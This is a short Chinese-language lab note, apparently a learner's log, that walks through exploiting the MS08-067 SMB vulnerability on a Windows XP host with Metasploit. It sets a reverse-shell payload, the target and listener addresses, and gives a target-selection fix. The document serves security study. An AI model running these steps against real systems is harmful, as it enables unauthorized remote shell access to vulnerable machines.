Metasploit学习实验一:攻击445(xp系统)端口,ms08_067_netapi攻击模块。
第一步:打开postgresql数据库,开启msf
第二步:设置漏洞攻击(攻击模块):$ use exploit/windows/smb/ms08_067_netapi
第三步:查看可攻击目标信息:$ show targets
第四步:查看有效攻击载荷:$show payloads
第五步:设置攻击载荷(payload):$set payload generic/shell_reverse_tcp(不同载荷的区别,深入学习)
第六步:查看攻击选项 :$show options
第七步:设置攻击目标:$set RHOST 目标IP
第八步:设置监测机:$set LHOST 本机IP
第九步:攻击。
出现一个提示:Exploit completed, but no session was created.
这个暂时不知道原因,但是我用的解决办法是设置攻击目标信息:$set target 10.
根据不同的系统版本选择攻击入口。